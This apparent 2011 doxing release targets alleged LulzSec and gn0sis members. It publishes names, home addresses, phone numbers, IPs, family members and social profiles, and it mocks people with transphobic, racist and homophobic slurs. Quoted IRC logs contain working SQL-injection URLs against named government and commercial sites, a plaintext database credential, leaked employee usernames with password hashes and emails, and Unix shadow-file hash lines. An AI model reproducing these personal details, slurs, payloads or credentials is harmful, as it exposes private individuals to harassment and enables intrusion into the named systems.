################################################################################################################################## ################################################################################################################################## ud$$$**$$$$$$$bc. u@**" 4$$$$$$$Nu J ""#$$$$$$r @ $$$$b .F ^*3$$$ :% 4 J$$$N $ :F :$$$$$ 4F 9 J$$$$$$$ 4$ k 4$$$$bed$$$$$$$$$ $$r 'F $$$$$$$$$$$$$$$$$r $$$ b. $$$$$$$$$$$$$$$$$N $$$$$k 3$$$$$$b $$$$$$$."$$$$$$$$$ .@$**N. $$$$$" $$$$$$F'L $$$$$$$$$$$ $$$$$$$ :$$L 'L $$$$$ 4$$$$$$ * $$$$$$$$$$F $$$$$$F edNc @$$$$N ^k $$$$$ 3$$$$*% $F4$$$$$$$ $$$$$" d" z$N $$$$$$ ^k '$$$" #$$$F .$ $$$$$c.u@$$$ J" @$$$$r $$$$$$$b *u ^$L $$ $$$$$$$$$$$$u@ $$ d$$$$$$ ^$$$$$$. "NL "N. z@* $$$ $$$$$$$$$$$$$P $P d$$$$$$$ ^"*$$$$b '*L 9$E 4$$$ d$$$$$$$$$$$" d* J$$$$$r ^$$$$u '$. $$$L "#" d$$$$$$".@$$ .@$" z$$$$*" ^$$$$. ^$N.3$$$ 4u$$$$$$$ 4$$$ u$*" z$$$" '*$$$$$$$$ *$b J$$$$$$$b u$$P $" d$$P #$$$$$$ 4$ 3*$"$*$ $"$'c@@$$$$ .u@$$$P "$$$$ ""F~$ $uNr$$$^&J$$$$F $$$$# "$$ "$$$bd$.$W$$$$$$$$F $$" ?k ?$$$$$$$$$$$F'* 9$$bL z$$$$$$$$$$$F $$$$ $$$$$$$$$$$$$ '#$$c '$$$$$$$$$" .@"#$$$$$$$$$$$$b z* $$$$$$$$$$$$N. e" z$$" #$$$k '*$$. .u* u@$P" '#$$c "$$c u@$*""" d$$" "$$$u ^*$$b. :$F J$P" ^$$$c '"$$$$$$bL d$$ .. @$# #$$b '#$ 9$$$$$$b 4$$ ^$$k '$ "$$6""$b u$$ '$ d$$$$$P '$F $$$$$" ^b ^$$$$b$ '$W$$$$" 'b@$$$$" ^$$$* _ _ _____ _ _____ _ | | | | __ | _ | (_) | _ | | | | |_ _| |_______ ___ ___ / / __ _ _ __ | |/' | ___ _ ___ | |/' |_ ___ __ ___ __| | | | | | | |_ / __|/ _ \/ __| / / / _` | '_ \| /| |/ __| / __| | /| \ \ /\ / / '_ \ / _ \/ _` | | | |_| | |/ /\__ \ __/ (__ / / |(_| | | | \ |_/ /\__ \ \__ \ \ |_/ /\ V V /| | | | __/ (_| | |_|\__,_|_/___|___/\___|\___| / / \__, |_| |_|\___/ |___/_|___/ \___/ \_/\_/ |_| |_|\___|\__,_| /_/ __/ | |___/ ################################################################################################################################## ################################################################################################################################## To understand who/what lulzsec/gn0sis are/is you need to understand where they came from. Everything originates from the *chan (4chan/711chan/etc.) culture. This internet subculture is pretty much the dregs of the internet. It's a culture built around the anonymity of the internet. If your anonymous no one can find you. No one can hurt you, so your invincable. The problem with this idealogy, is it's on the internet. The internet by definition is not anonymous. Computers have to have attribution. If you trace something back far enough you can find its origins. So let's give a brief event timeline on how these groups got together: 1. Anonymous rises up from 4chan against CoS. 2. Anonymous starts DDoSing stuff. 3. Various lower level hacking groups get involved. 4. Anonymous stagnates for a while. 5. Uprisings in the world Attract Anonymous. 6. ProjectPM Looser Barrett Brown becomes mouth piece of Anon. 7. Anonymous shifts focus toward "Worldy" Affairs. 8. Aaron Barr desides he's tired of his job and targets Anon. 9. gn0sis (Uncommon) comes out of no where and releases the Gawker data. 10. gn0sis teams up with anon hackers with all the OP crap. 11. gn0sis (nigg, eekdacat, uncommon, kayla, lauralie) and sabu (from OP Anon shit) hack HBGary. 12. This is where Topiary comes in. They all form lulzsec to be "hacktivists". 13. Lulzsec (now a mix of gn0sis and opanon people) hack SONY and other stuff. The problem with Lulzsec/gn0sis's "Hacktivist" mantra is that they lack the skills to keep it going. As such after SONY they couldn't get into anything. So they switched their focus to just releasing random crap that didn't mean anything. Then they started running out of things they could hack. So they put out requests for people to join them. That got them a few hits, and now they've switched their gears again to be "ANTI-SEC". Whether or not this was an attempt at bring other groups out of the shadows (el8, h0no, zf0, etc), you can only speculate. But as of this writing: 6/24/2011 Sabu and Topiary are the only two people updating the twitter and releasing shit. Kayla is MIA. The gn0sis kids are gone in hiding somewhere. From what we've seen these lulzsec/gn0sis kids aren't really that good at hacking. They troll the internet and search for sqlinjection vulnerabilities as well as Remote File Include/Local File Include bugs. Once found they try to download databases or pull down usernames and passwords. Their releases have nothing to do with their goals or their lulz. It's purely based on whatever they find with their "google hacking" queries and then release it. What's funny to us is that these kids are all "Anti-Sec" yet by releasing their hacks they are forcing these companies to have to hire security professionals which keeps the Security Industry that they are trying to expose and shut down, in business. I guess they will realise that later in life when they get out of skid school. So we've been tracking and infiltrating these kids since the gawker hack. We have the D0x (as they call it) on everyone except Sabu and Kayla. First we'll go with the kid who did the gawker hack: Uncommon. ################################################################################################################################## ################################################################################################################################## ooooo ooo `888' `8' 888 8 ooo. .oo. .ooooo. .ooooo. ooo. .oo. .oo. ooo. .oo. .oo. .ooooo. ooo. .oo. 888 8 `888P"Y88b d88' `"Y8 d88' `88b `888P"Y88bP"Y88b `888P"Y88bP"Y88b d88' `88b `888P"Y88b 888 8 888 888 888 888 888 888 888 888 888 888 888 888 888 888 888 `88. .8' 888 888 888 .o8 888 888 888 888 888 888 888 888 888 888 888 888 `YbodP' o888o o888o `Y8bod8P' `Y8bod8P' o888o o888o o888o o888o o888o o888o `Y8bod8P' o888o o888o ################################################################################################################################## ################################################################################################################################## Uncommon(Richard Fontaine): How to find Uncommon: His USER/IP: Richard Fontaine richard@ks354873.kimsufi.com ks354873.kimsufi.com is the server that hosts: http://cfyp.org.uk/ http://cfyp.org.uk/ is admined by: Daniel Rhodes-Mumby (http://cfyp.org.uk/2010/07/technical-issues-21st-july-2010/) Daniel Rhodes-Mumby and Richard Fontaine are friends from school (check their facebooks). We do not know if Daniel Rhodes-Mumby has anything to do with hacking, but he does allow Richard to bounce from his box... Daniel Rhodes-Mumby (https://www.facebook.com/drhodesmumby): Cashier at BrightHouse Studying BA (Hons) Politics at University of Salford Lives in City of Salford In a relationship with Alisha 'Magikarp' Barton Knows English, German, French From Grimsby, North East Lincolnshire, United Kingdom Born on December 4, 1991 Richard Fontaine (Uncommon)(https://www.facebook.com/jarofdoom): Studying Chemistry MChem at University College of Wales, Bangor Lives in Bangor, Gwynedd From Grimsby, North East Lincolnshire, United Kingdom Sister's: Charlotte Fontaine: Bartender at Cleethopes Bowling Alley Studied at Nottingham Trent Lives in Grimsby, North East Lincolnshire, United Kingdom Married to Melissa Scott - LESBOZ!!! From Grimsby, North East Lincolnshire, United Kingdom Natalie Fontaine: Transport Manager at Ski France Went to Caistor Grammar School In a relationship Richard Fontaine is also deaf and wears a hearing aid. Here is his picture: ----8<-----REMOVE-------8<-----GAWKER-HACK-PROOF----8<-----REMOVE-------8<----- 20:58 sup 22:23 nm 22:23 Packing 22:53 for? 22:54 moving from flat to house 22:54 flat? are you like some eurofag? 22:54 j/k 22:55 do any of you guys still have ax to gaker? 22:55 gawker* 22:55 no mate 22:55 some faggot poinmted the sploit out 22:55 that was a hilarious hack 22:55 my lawd 22:56 pointed the sploit out? 22:56 like released it? 22:57 it was an OOOOOOOOOOOOOOOLD sploit 22:57 but someone said we used it to get in 22:57 it'd been around for 2 yr 22:57 oh so you lost ax? 22:57 Yeah 22:57 =[ 22:58 ikr 22:58 tell me abt it ----8<-----REMOVE-------8<-----GAWKER-HACK-PROOF----8<-----REMOVE-------8<----- ----8<-----REMOVE-------8<-----GAMER-HACK--PROOF----8<-----REMOVE-------8<----- 05:27 ee: wat wat 05:28 haven't seen nigg in a long time 05:28 i've got his and insids number 05:28 thts what i forgot 05:29 xyz is in jail cause eidos 05:29 good fucking riddance imo 05:29 LONG overdu 05:29 and it was public knowledge 05:29 that nigg was involved 05:29 :/ 05:29 I'll connect to the hetz irc then 05:29 http://krebsonsecurity.com/2011/05/anonymous-splinter-group-implicated-in-game-company-hack/ 05:30 Also in the channel discussing the defacement and theft of the Deus Ex database are hackers .ev0,. .nigg. and .e., screen names of Anonymous sympathizers who have been connected with Ryan.s recent coup. 05:30 then xyz got busted 05:31 which makes me wonder ----8<-----REMOVE-------8<-----GAMER-HACK--PROOF----8<-----REMOVE-------8<----- ----8<-----REMOVE-------8<-----HOTEL-HACK--PROOF----8<-----REMOVE-------8<----- 16:13 https://mysales.deltahotels.com/docs/151/phpDf2437a.doc 16:13 rename to .gz 19:28 btw 19:28 the onjly reason they 'targeted' arizona was because it was they that they could find a sploit for ----8<-----REMOVE-------8<-----HOTEL-HACK--PROOF----8<-----REMOVE-------8<----- ################################################################################################################################## ################################################################################################################################## oooooooooooo oooo .o8 oooo . `888' `8 `888 "888 `888 .o8 888 .ooooo. 888 oooo .oooo888 .oooo. 888 oooo .oooo. .o888oo 888oooo8 d88' `88b 888 .8P' d88' `888 `P )88b 888 .8P' `P )88b 888 888 " 888ooo888 888888. 888 888 .oP"888 888888. .oP"888 888 888 o 888 .o 888 `88b. 888 888 d8( 888 888 `88b. d8( 888 888 . o888ooooood8 `Y8bod8P' o888o o888o `Y8bod88P" `Y888""8o o888o o888o `Y888""8o "888" ################################################################################################################################## ################################################################################################################################## Now let's look at EE or EEKDACAT: How to find EEKDACAT: EE Uses those Busy Box Bounces that were dropped in the lulzsec/gn0sis private channel logs (which were leaked). bounce: 89-38-2-102.tcnet.com.br (189.38.2.102) Hacked Busy Box IP (from Nigg). We back hacked him all the way back to his Home IP in Sartoga NY. originating ip: 74.67.45.11 cpe-74-67-45-11.nycap.res.rr.com (saratoga ny) Now this kid actually hacks stuff. He goes around and does his little google query hacking thing. Fing's his SQLinjections He then goes and downloads the databases. This is the kid who helped Uncommon with the attack on Gawker. Here is a big log of all the things he's hacked and is hacking. Along with proof that he was using a stolen router (which we back hacked him from) ----8<-----REMOVE-----8<-----EEKDACATs-HACK-PROOF----8<-----REMOVE-------8<----- 17:32 http://masscool.com/category.php?pid=125%20union%20select%201,2,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,4,5,6,7,8-- 17:37 delicious 17:39 $dbc = mysql_connect('sql108.byethost18.com', 'b18_8176605', 'oandh123'); 06:07 Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at www.ovh.net Port 80 05:58 http://ariannaonline.huffingtonpost.com/columns/column.php?id=-1%20union%20select%201,database%28%29,version%28%29,4,user%28%29-- 06:08 huh 06:08 have a look at 06:08 https://pastee.org/j47kk ########(this file rowen.txt is attached below [FILE ATTACHMENT SECTION] as it is no longer on on the site)######## 06:08 rowrowrowyourb0at! 06:09 trying to get the grades of 3 students 06:10 this warrants the theft of 11000 06:12 can't seem to shell it 06:12 into outfile 12:38 all .gov.cns seem to be configured the exact same way 12:40 http://www.shuangliu.gov.cn/En/Detail.php?id=60061 12:51 < Uncommon> wats dis 13:13 i was hacking .gov.cn's 13:13 and did that 13:13 also 13:13 http://www.ykzzb.gov.cn/newsinfo.php?id=-1%20union%20select%201,concat_ws%280x3a,username,password,email%29,3,user%28%29,5,6%20from%20cdb_members%20limit%200,1-- 13:13 huaehauehauehaueaheuahue 14:06 http://jsfgj.yeda.gov.cn/show.php?id=127%20and%201=%28select%201%29 (blind) 14:06 http://www.investhg.gov.cn/show.php?id=248%20union%20select%201,2,3,4,5,6,7-- (selectable) 14:06 http://www.ahshx.gov.cn/content/coll_view.php?id=-1%20union%20select%201,2,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13-- 14:06 http://www.ccpitzj.gov.cn/showpassage_E.php?id=-1%20union%20select%201,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14-- 14:06 ching chong 15:19 wanna do some ownage 15:20 what you got goin on? 15:21 found one of my old dbs 15:21 was to medusoft.eu 15:21 passes still might work 15:21 1 aug 2009 15:22 trying to pastee it 15:25 http://cryptobin.org/76e173u4 ########(this file medu.txt is attached below [FILE ATTACHMENT SECTION] as it is no longer on on the site)######## 15:25 medus0fT!medus0fT!medus0ft? 15:26 medusoft = dutch mcafee 15:26 had an sqli a while back and i pulled the names 15:26 forgot to give them out 15:26 also ALL THEIR CUSTOMERS 15:26 my god the hacks 15:35 have 15:35 nvidia india here too 15:35 pkrishna :: 7d6f11ed60491e9f5bb2efe71717888b :: pkrishna@nvidia.com 15:35 dmulakkayala :: 56ab24ff89b944c6250a59cba6893d31 :: dmulakkayala@nvidia.com 15:35 nyagnamurthy :: 8493f7037bb221945d4308764470a1cf :: nyagnamurthy@nvidia.com 15:35 rkaushal :: 8493f7037bb221945d4308764470a1cf :: rkaushal@nvidia.com 15:35 hkodihalli :: 8493f7037bb221945d4308764470a1cf :: hkodihalli@nvidia.com 15:35 araghavan :: fb19cb3041a96f7f478c40dede8d6beb :: araghavan@nvidia.com 15:35 etc etc 15:37 best old injection i had that doesn't work anymore 15:37 was on some pakistani gov site 15:37 that was aarently tied into military 15:37 aarently their air defence pass was 445566 15:37 air defence:2b792dabb4328a140caef066322c49ff 15:37 aag pa 2:4f26ed30767738d82936c671d2a075ed 15:37 Administrator:6abd62383d0d5fb96fa5fbbbb23b00ce 15:37 Administrator:d09253ad5c1aa6169f73fe88470e3b54 16:20 i'm on a stolen router 16:20 also i didn't hit all the stuff i posted here todayt 16:20 that was over like 2-3 years 16:21 medusoft is 2 years old almost 16:21 plus i don't really deface 16:21 if there's accts on an injection i add them to a huge list of urls 16:21 and farm them for weeks 16:22 no need to kill the host so quickly 16:22 did glaad.org ever get defaced 16:23 with the injection on it 16:24 had a great digital spec ad to put up for defacement 16:24 actually 2 great spec ads 16:24 defacing with shoutouts for pride is lame you gotta really sell it ----8<-----REMOVE-----8<-----EEKDACATs-HACK-PROOF----8<-----REMOVE-------8<----- ################################################################################################################################## ################################################################################################################################## ooooo oooo o8o `888' `888 `"' 888 .oooo. oooo oooo oooo d8b .ooooo. 888 .oooo. oooo 888 `P )88b `888 `888 `888""8P d88' `88b 888 `P )88b `888 888 .oP"888 888 888 888 888ooo888 888 .oP"888 888 888 o d8( 888 888 888 888 888 .o 888 d8( 888 888 o888ooooood8 `Y888""8o `V88V"V8P' d888b `Y8bod8P' o888o `Y888""8o o888o ################################################################################################################################## ################################################################################################################################## Next we have Laurelai. He is another transgendered non-hacker. He is also very ugly. Name: Laurelai Bailey AKA Wesley Bailey Born: 15 January 1982 Location: Davenport, Iowa (Quad Cities Metro Area) [Current] Fayetteville, AR [Previous] Austin, TX [Previous] Job: Tech Team Global Phone: 563-505-6082 Computer: Handles: Laurelai, artixstorm IP: ~Laurelai@205.185.113.6 ( Frantech VPS ) Phone: Android Tablet: iPad OS: CentOS Profiles: https://www.facebook.com/laurelai.bailey http://disqus.com/facebook-771323265/ http://www.linkedin.com/pub/laurelai-bailey/31/995/5b5 http://www.scribd.com/laurelaib/info http://www.xfire.com/profile/wesleyraziel/ http://steamcommunity.com/id/artixstorm https://github.com/Laurelai http://www.janimes.com/forum/index.php?/user/35904-laurelai/ http://twitter.com/#!/ArtixStorm http://www.stickam.com/artixstorm http://www.myspace.com/artixstorm/ Sites: paralox.org ? oneechan.org Notes: Transgendered woman name she chose means 'temptress' yet she is hideous Location confirmed by phone location/linkedin/facebook and also mentions quad city area on reddit Name confirmed by facebook Pics confirmed by facebook/oneechan.org She Leaked #hq logs before gnosis/hbgary hackers became Lulzsec --- identification --- About: "Laurelai" is a failed chanology troll with a vendetta against Gregg Housh and AnonOps Legal Name: Wesley Bailey Occupation: Systems Administrator Aliases: - Laurelai Storm - Laurelai Bailey - Trinity Bailey - Raziel Twitter: @stuxnetsource Domains: - oneechan.org: setup as "trans support" Irc: - irc.oneechan.org: #oneechan - botnet.biz: #tr0ll Email Addresses: - laurelai@oneechan.org - wesley.raziel@gmail.com Facebook: http://facebook.com/laurelai.bailey AIM: lulzchan ED: http://encyclopediadramatica.com/Raziel+wesley+bailey+chanology Affiliations: - Gnosis (Hacker group responsible for Gawker hack) - AnonOps Oper: 18:16 [tsukihi] -OperServ(services@dproj.info)- Laurelai - Oper + Services Root Administrator DOB: 1-15-82 Residence: Waterloo, Iowa Home Internet: 173.23.30.122 Hometown: Killeen, TX Bio: 10 year army veteran: stations in Killeen and Korea Personal: Laurelai is a pre-operative "transsexual" --- systems --- - vps-node1: Laurelai:x:525:525::/home/Laurelai:/bin/bash --- Gnosis --- - members: kayla,garrett,Laurelai,pw,Uncommon,Eekdacat,Fubar,berry,egeste,insid,nigg,tflow --- connections --- - uncommon (UncommonGN on twitter) is responsible for the google dork that lead to the gawker compromise - kayla according to laurelai is laurelai's protege - jennifer emick and him were involved in the same troll group: http://encyclopediadramatica.com/Jennifer_Emick - sabu: soley responsible for the attack on HBGary no matter what Kayla sells you it was all Sabu; he's 'anti-sec 4 life dood' ----8<-----REMOVE-----8<-----LAURELAI-SNITCH-LOG----8<-----REMOVE-------8<----- Laurelai also like's to brag about screwing over her supposed hacker friends in this snitch log: 19:42 guess who payed me a visit 19:42 fbi? 19:43 i dot 'know who 19:49 well i know it's not your "friend" because that's a phsyical impossibility 20:23 fbi 20:23 oh ya? 20:23 yeah it was deh feds 20:23 last night? 20:23 i told them sabu did it all 20:23 this morning 20:23 lol 20:23 oh did they say why 20:23 and i told them kayla was MI5 20:23 lol 20:23 yeah over HBgary 20:24 told them the long boring history of chanology 20:24 and how greg housh and topiary ran anonops 20:24 and harrassed jen 20:24 so you had a nice chat 20:24 and how barrett brown was in on it 20:24 this is a crazy fed visit 20:24 yes 20:24 even offered them tea 20:24 usually they just stick guns to my head 20:24 they walked up to my door 20:24 and sais 20:25 a kinder gentler fed 20:25 are you laurelai 20:25 i said yah 20:25 why 20:25 and 20:25 they used my proper pronouns 20:25 best raid evar 20:25 *very* respectful 20:25 want me to be an informant on account im everywhere and iwas in the army 20:25 well i guess jen gets her retribution finally 20:25 w00t 20:26 ie. like before 20:26 lol 20:26 so i can feed them w/e i want 20:26 yes 20:26 they took my hard drives and my ipad tho 20:26 everything was wiped 20:26 and encrypted 20:26 and wiped 20:26 repeated 20:26 and my netbook 20:27 is fried from it 20:27 lol 20:27 so how are we talking now 20:27 they left my cd's 20:27 and my blank 2 tb hdd 20:27 and my hardware 20:27 i see 20:27 just took the hdd's 20:28 do you want to help them? 20:28 nicest raid ever 20:28 ya that's pretty reasonable 20:28 imma help them help me 20:28 :) 20:28 saabu did it all 20:28 cause im sexy 20:29 you told them about marblecake? 20:29 yes 20:32 what did they say 20:40 also lol @ the most polite raid ever 20:40 i'm pretty convinced they just take your hardware mostly to inconvenience you 20:41 i can't imagine they spend too much time cracking your shit 20:43 i mean realistically 20:49 why would they 20:49 i gave them the truecrypt password 20:49 no need to crack 20:50 you gave them a TC passphrase to an empty disk? 20:50 to a disc with porn and warez 20:50 and they already told me 20:50 lol 20:50 they didnt care about it 20:50 the porn and warez? 20:51 nope 20:51 they told me 20:51 not illegal to download 20:51 just to sell it 20:51 but 20:51 to please not dl anymore 20:52 did they at any point serve you a warrant? 20:56 yes 20:56 well that IS polite 20:56 they did that first 20:56 i never get to SEE the warrant 20:56 it's usually not signed by a judge 20:56 they read it to me 20:56 and i got a copy 20:57 they were gonna take my hardware but i talked them otu of that 20:57 they just took the hdd 20:57 and my ipad 20:57 :| 20:57 that sucks 20:58 fkin jews 20:58 oh well 20:58 they are tools 20:58 and now they are my toosl 20:59 post a pic of the warrant 21:00 lol 21:00 its silly 21:00 it covers so much shit 21:00 we talked for like 5 hours 21:01 and gave me their card 21:01 and asked me to let them know the next time kayla tweeted 21:01 what do they want with `k 21:01 speaking of i got to call them 21:01 what do you think 21:01 about? 21:01 they were hot after kayla 21:02 what do i think about what 21:02 they want kayla 21:02 asking over and over 21:02 i see 21:02 give them kayla? 21:02 kayla kayl kayla 21:02 sure what i know 21:02 what's the obsession with xyrix 21:02 i mean kayla 21:02 totally kayla 21:02 i told them my theory 21:02 that kayla was MI5 21:03 why would you even have a theory like that 21:03 oh we talked about HBGary 21:03 because its one of my pet conspiracy theories i throw around for lulz 21:03 i also told them 21:03 that kayla hated greg hoglund 21:04 with a passion 21:04 and that he knew her irl but didnt relize he knew her 21:04 hope he enjoys the talk with the feds 21:04 lol 21:05 i said im an innocent reporter ill cooperate sir 21:05 you and BB! 21:05 innocent as the day is long ;D 21:05 so you have to call agen so and so 21:06 to discuss the contents of your hdd 21:06 what contents? 21:06 its all junk and warez 21:06 i wiped remember 21:07 even wiped all my irc logs from oneechan 21:07 good job 21:07 they were looking for logs 21:07 i told them i didnt log except HQ 21:07 and that was already public 21:08 told them about fake gregg 21:08 and how i thought he was an informat 21:08 see iw as trying to go forward to LE 21:09 :D 21:09 i socialed the fuck out of them 21:09 what did they say about that 21:09 hard 21:09 so hard 21:09 oh 21:09 they wanted his twitter account info 21:10 they never heard of FGH before now 21:10 i bet they want to talk to him about pretending to work with the gov 21:10 i hope he enjoys his convo 21:10 heh 21:11 vigilantism 21:11 basically now im their go to girl for anything anon related 21:12 good news 21:12 yup 21:13 falls right into the plan 21:17 you go to work? 21:19 im at work now 21:19 they were nice enough to finish before i had to get ready 21:23 a kinder gentler fbi 03:37 intimidated 03:39 yeah 03:39 he was shaking when he talked to me 03:39 used um alot 03:39 i spoke confidently 03:39 acted like i was queen of my castle 03:44 why would he be afraid of me 03:48 no idea 03:52 i mean i can tell when im intimidating someone 03:53 he was intimidated 03:53 how many feds? 04:05 like 12 04:05 nobody pulled a gun and nobody was a dick 04:05 everyone was real polite 04:05 i like polite 04:06 they even bought me a coke 04:06 like 04:06 sent one of their dudes out to go get it for me 04:06 are you high or something? 04:07 no 04:07 adrenalin 04:07 ok just makin sure 04:07 you weren't seein invisible v&'s 04:07 i thought they had come to arrest me 04:07 but no 04:07 they asked for my help 04:07 politely 04:07 i mean the idea that an arresting officer went out to get you a fucking coke is a bit absurd to be blunt 04:07 i mean don't you think? 04:08 i was never under arrest 04:08 they were there 04:08 yes you were 04:08 if they were there you were under arrest 04:08 no 04:08 they said 04:08 you are not under arrest 04:08 you dont have to talk to us 04:08 if you want to stop 04:08 at any time you can 04:08 and we will go 04:09 they had a document to that effect too 04:11 im not even fucking joking 04:15 they want topiary too 04:15 and sabu 04:15 wanted them already 04:15 but you know 04:15 sabu did it all ----8<-----REMOVE-----8<-----LAURELAI-SNITCH-LOG----8<-----REMOVE-------8<----- ################################################################################################################################## ################################################################################################################################## ooooo ooo o8o `888b. `8' `"' 8 `88b. 8 oooo .oooooooo .oooooooo 8 `88b. 8 `888 888' `88b 888' `88b 8 `88b.8 888 888 888 888 888 8 `888 888 `88bod8P' `88bod8P' o8o `8 o888o `8oooooo. `8oooooo. d" YD d" YD "Y88888P' "Y88888P' ################################################################################################################################## ################################################################################################################################## Now we have NIGG. His real name is TOM. His real Name, Username, PC Name, and Home IP is: Tom Tom@Tom-PC 92.20.236.78 He is a minor hacker in the group. He is the one who got all the stolen routers that everyone is useing. ----8<-----REMOVE-----8<-----BUSYBOX-HACK--PROOF----8<-----REMOVE-------8<----- 19:19 niggers 19:19 are using my fucking 19:19 busyboxes 19:19 for some shitty fucking http bot 19:19 in bash 19:19 aww man 19:19 the dumb niggers 19:19 that sucks 19:19 couldn't even get code exec 19:19 its not that fucking hard 19:20 lol 19:20 Told you to keep bboxes pvt 19:20 was private 19:20 to kayla 19:20 -_- 19:22 lol 19:22 you published it 19:22 you dick 19:23 hell even i had the busybox list 19:24 kayla gave it to anonops 19:24 i seen her do it 19:24 lol ----8<-----REMOVE-----8<-----BUSYBOX-HACK--PROOF----8<-----REMOVE-------8<----- ################################################################################################################################## ################################################################################################################################## ooo ooooo .o8 oooo `88. .888' "888 `888 888b d'888 .oooo. .oooo888 .ooooo. 888 .ooooo. oooo oooo ooo ooo. .oo. 8 Y88. .P 888 `P )88b d88' `888 d88' `"Y8 888 d88' `88b `88. `88. .8' `888P"Y88b 8 `888' 888 .oP"888 888 888 888 888 888 888 `88..]88..8' 888 888 8 Y 888 d8( 888 888 888 888 .o8 888 888 888 `888'`888' 888 888 o8o o888o `Y888""8o `Y8bod88P" `Y8bod8P' o888o `Y8bod8P' `8' `8' o888o o888o ################################################################################################################################## ################################################################################################################################## Now we have madclown aka BERRI. His real name is Peter. He claims to be Trans Gendered. His real Name, Username, PC Name, and Home IP is: Peter mad@PETER-PC.gateway.2wire.net He doesn't really do anything except have gender identity issues. originating ip: CPE-124-183-112-15.lns14.ken.bigpond.net.au (124.183.112.15) ################################################################################################################################## ################################################################################################################################## ooooooooooooo o8o 8' 888 `8 `"' 888 .ooooo. oo.ooooo. oooo .oooo. oooo d8b oooo ooo 888 d88' `88b 888' `88b `888 `P )88b `888""8P `88. .8' 888 888 888 888 888 888 .oP"888 888 `88..8' 888 888 888 888 888 888 d8( 888 888 `888' o888o `Y8bod8P' 888bod8P' o888o `Y888""8o d888b .8' 888 .o..P' o888o `Y8P' ################################################################################################################################## ################################################################################################################################## Now we have Topiary. Probably the lamest one of the bunch. He doesn't actually do anything except give interviews. There are plenty of logs of him all over the internet being a complete idiot. His "d0x" are all over the internet also. He tries to deny it but there are logs of him bitching about being d0x'ed int he #hq logs that Laurelai leaked. Name: Daniel Ackerman Sandberg Location: Sweden Computer: Handles: Atopiary, Gardenslayer, whirlpool Profiles: http://www.youtube.com/watch?v=0UmdcNqZmw8 ################################################################################################################################## ################################################################################################################################## .o. o8o . .888. `"' .o8 .8"888. oooo ooo oooo oooo ooo. .oo. oooo .o888oo .8' `888. `88. .8' `888 `888 `888P"Y88b `888 888 .88ooo8888. `88..8' 888 888 888 888 888 888 .8' `888. `888' 888 888 888 888 888 888 . o88o o8888o `8' `V88V"V8P' o888o o888o o888o "888" ################################################################################################################################## ################################################################################################################################## Dox: Name: Christopher Ellison Location: Colchester, Essex Business: avunit(.com) as Media Manager 00441473705206 Computer: Profiles: http://uk.linkedin.com/pub/christopher-ellison/31/611/684 http://www.facebook.com/profile.php?id=701043505 ? Sites: Notes: Dox confirmed by #hq logs where he says the dox posted are true ################################################################################################################################## ################################################################################################################################## .oooooo..o .o8 d8P' `Y8 "888 Y88bo. .oooo. 888oooo. oooo oooo `"Y8888o. `P )88b d88' `88b `888 `888 `"Y88b .oP"888 888 888 888 888 oo .d8P d8( 888 888 888 888 888 8""88888P' `Y888""8o `Y8bod8P' `V88V"V8P' ################################################################################################################################## ################################################################################################################################## Dox: Name: Hector Xavier Montsegur Location: New York, New York Race: Puerto Rican ? E-Mail: sabu@prvt.org Computer: Handles: 548U, hectic_les, leon IP: 199.68.198.129 (ssh-only.recklesstheory.com) Profiles: http://www.facebook.com/lesmujahideen ? Sites: prvt.org Notes: dox confirmed by archived whois entries for prvt.org (his personal site according to #hq logs which he anonymized DNS after release) ################################################################################################################################## ################################################################################################################################## . oooooooooooo oooo .o8 `888' `8 `888 .o888oo 888 888 .ooooo. oooo oooo ooo 888 888oooo8 888 d88' `88b `88. `88. .8' 888 888 " 888 888 888 `88..]88..8' 888 . 888 888 888 888 `888'`888' "888" o888o o888o `Y8bod8P' `8' `8' ################################################################################################################################## ################################################################################################################################## Dox: Name: Solomon Saleh Location: London, UK Job: Web Developer at Wikijob.co.uk Computer: Handles: timeflow, bottle_of_rum Profiles: https://www.facebook.com/dormitree http://about.me/solomon2 http://www.linkedin.com/in/solomonsaleh http://blog.kornar.com/ Sites: Notes: dox refinforced by facebook (computer science interests) and about.me (claims to be a hacker, londoner) ################################################################################################################################## ################################################################################################################################## o8o o8o .ooooo. .o `"' `"' 888' `Y88. o888 oooo .ooooo. .ooooo. oo.ooooo. oooo .ooooo. 888 888 888 `888 d88' `88b d88' `88b 888' `88b `888 d88' `88b `Vbood888 888 888 888 888 888ooo888 888 888 888 888ooo888 888' 888 888 888 888 888 .o 888 888 888 888 .o .88P' 888 888 `Y8bod8P' `Y8bod8P' 888bod8P' o888o `Y8bod8P' .oP' o888o 888 888 .o. 88P o888o `Y888P ################################################################################################################################## ################################################################################################################################## Dox: Name: Sven Slootweg Location: Wijnstraat 211 3311BV Dordrecht, Netherlands Phone: (+31) 06 - 26 51 99 55 E-Mail: info@sven-slootweg.nl jamsoftgamedev@gmail.com jamsoftgamedev@yahoo.com Computer: IP: @an-2A2E2EE5.adsl.wanadoo.nl Profiles: http://twitter.com/#!/joepie91 Sites: www.yunicc.ws www.chinacheep.com www.anonnews.org www.sven-slootweg.nl Notes: Name reinforced by #hq logs (he claims his personal site) and confirmed by LulzSec Exposed logs (mentions theyre his sites) Name confirmed by twitter Phone confirmed by gmail Location reinforced by Lulzsec Exposed logs Lulzsec affiliate, friend of Ryan ################################################################################################################################## ################################################################################################################################## Now we know that some other people have passed some stuff (senate.gov) to lulzsec (you will be owned soon mindwar). We think that with these kid's exposed as long as other people stop passing lulzsec hacks that it will eventually die off. Kayla and sabu lack the skill to do anything more then go after the low hanging fruit. Now keep in mind lulzsec will try to claim that gn0sis isn't part of lulzsec or that no one is lulzsec. They will also try to claim that these d0x are corrent. If you look at these attacks demonstrated here, this is all the stuff that lulzsec hasn't released yet and probably wont release because as of this writing gn0sis has split from lulzsec. Which is why lulzsec is request help from outside sources. Because Sabu and Kayla lack the skills to hack anything on their own. Sabu and Kayla are the ones responsible for HBGary (gn0sis found the vulnerability vector though). This is evident in kayla's dumping part of the shadow file to our spies: (08:03:13 PM) kayla: root:$1$XvkHbOb.$hEB8k8G/YXcQadaGFCcsS0:15011:0:99999:7::: (08:03:13 PM) kayla: jussi:$1$N0aKf9ao$.AZNp8UbP2JXDpaes64iG.:13378:0:99999:7::: (08:03:14 PM) kayla: 